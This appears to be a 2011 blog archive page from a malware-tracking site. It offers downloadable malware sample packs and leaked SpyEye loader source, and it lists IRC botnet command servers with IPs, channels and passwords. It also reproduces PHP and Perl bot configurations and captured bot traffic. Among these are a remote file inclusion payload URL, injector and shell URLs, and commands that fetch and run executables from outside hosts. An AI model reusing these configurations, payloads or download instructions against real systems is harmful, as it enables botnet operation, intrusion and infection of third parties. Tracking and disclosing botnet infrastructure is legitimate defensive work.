Month: August 2011

45mb malware samples

Uncategorized

Another package with diferent malwares like spyeye samples,ransomwares,irc bots etc have fun Download: http://adf.ly/2KF81

irc.tux-family.com(linux bots hosted in United States Dallas Theplanet.com Internet Services Inc)

Uncategorized

var $config = array(“server”=>”207.44.182.29”, “port”=>”6667”, “pass”=>””, “prefix”=>”[BOTNET]”, “maxrand”=>”6”, “chan”=>”#theowners”, “chan2″=>”#”, “key”=>””, “modes”=>”+p”, “password”=>”jorge”, “trigger”=>”.”, “hostauth”=>”*” var $config = array(“server”=>”207.44.182.29”, “port”=>”6667”, “pass”=>””, “prefix”=>”botnet”, “maxrand”=>”6”, “chan”=>”#haxixe”, “chan2″=>”#”, “key”=>”*”, “modes”=>”+p-ix”, “password”=>”Maconha”, “trigger”=>”.”, “hostauth”=>”*” Now talking in # ([botnet304407) [uname!]: Linux s227.xrea.com 2.4.32 #5 Tue Feb 14 01:43:10 JST 2006 i686 (safe: on) ([botnet304407) [vuln!]: http://www.agua-japan.com/renheren/modules/xfsection//modify.php?dir_module=http://haxixe.t35.com/tbot.txt? ([botnet752802) [uname!]: LinuxRead more...

SpyEye 1.3.45 owned Loader source included

Uncategorized

SpyEye got pwned by Xylitol a jung french reverser here u have the source of Loader for SpyEye 1.3.45 Download Download Download i m not including executables because this is not made for helping lamers using spyeye learn from the source that’s all

208.117.34.101(ngrBot hosted in United States Laird Hill Steadfast Networks)

Uncategorized

Remote Host Port Number 199.15.234.7 80 74.117.178.7 80 208.117.34.101 1888 PASS ngrBot PRIVMSG #XP :[d=”http://dc230.4shared.com/download/BAHlq0z5/refdf.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 NICK n{US|XPa}olgmwse USER olgmwse 0 0 :olgmwse JOIN ##center 1963.g3rb3rs1t0.3691 JOIN #XP JOIN #new JOIN #US hosting infos: http://whois.domaintools.com/208.117.34.101

200.107.255.114(irc bot hosted in Ecuador Lutrol S.a)

Uncategorized

Remote Host Port Number 174.121.14.164 80 174.36.56.201 80 188.40.87.249 80 195.210.28.38 80 195.250.147.177 80 204.2.197.201 80 208.94.1.214 80 209.17.74.144 80 66.115.184.85 80 66.115.184.87 80 200.107.255.114 4244 ircd here PASS google_cache2.tmp 74.125.157.120 443 NICK new[iRooT-XP-USA]338226 USER 3382 “” “TsGh” :3382 JOIN #!N!# WTF PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited! hosting infos: http://whois.domaintools.com/200.107.255.114

erofolio.no-ip.biz(Ganja bot hosted in United States Greenville Gsp Adsl Cbb)

Uncategorized

Remote Host Port Number 184.168.48.1 80 74.177.79.142 6667 NICK [00|USA|XP|SP2]-2865 USER tufzv 0 0 :[00|USA|XP|SP2]-2865 USERHOST [00|USA|XP|SP2]-2865 MODE [00|USA|XP|SP2]-2865 -i JOIN #exe PRIVMSG #exe :-=MAIN=- Downloading update from: http://www.bloodyearlobesmusic.com/css/eFUD.exe PONG :55B3DFD6 Nick: New[GaNjA-XP-AUT]141568 Username: 8829 Joined Channel: #spiffy 46.105.241.160:6667 Nick: New{FR-XP-x86}5276416 Username: 5276416 Server Pass: secret Joined Channel: #justin with Password secret * The dataRead more...

gangbang.mytijn.org(linux bots hosted in India Noida Net4india Ltd)

Uncategorized

$servidor = ‘gangbang.mytijn.org’ unless $servidor; my $porta = ‘25343’; my @adms = (“Ha45K”); my @canais = (“#e109#”); Resolved : [gangbang.mytijn.org] To [117.211.84.155] Resolved : [gangbang.mytijn.org] To [76.10.213.195] Resolved : [gangbang.mytijn.org] To [113.30.137.146] var $config = array(“server”=>”gangbang.mytijn.org”, “port”=>”23232”, “pass”=>””, “maxrand”=>”1”, “chan”=>”#wWw#”, “chan2″=>”#wWw#”, “key”=>”scan”, “modes”=>”+p”, “password”=>”41aa15390e2efa34ac693c3bd7cb8e88”, “trigger”=>”.”, “hostauth”=>”0wn3d.3u”); my $injector = “http://www.m-crystal.kz/backup/pbot.txt?”; my $botshell = “http://outdoorbg.com/e107_files/public/sh.txt?”; myRead more...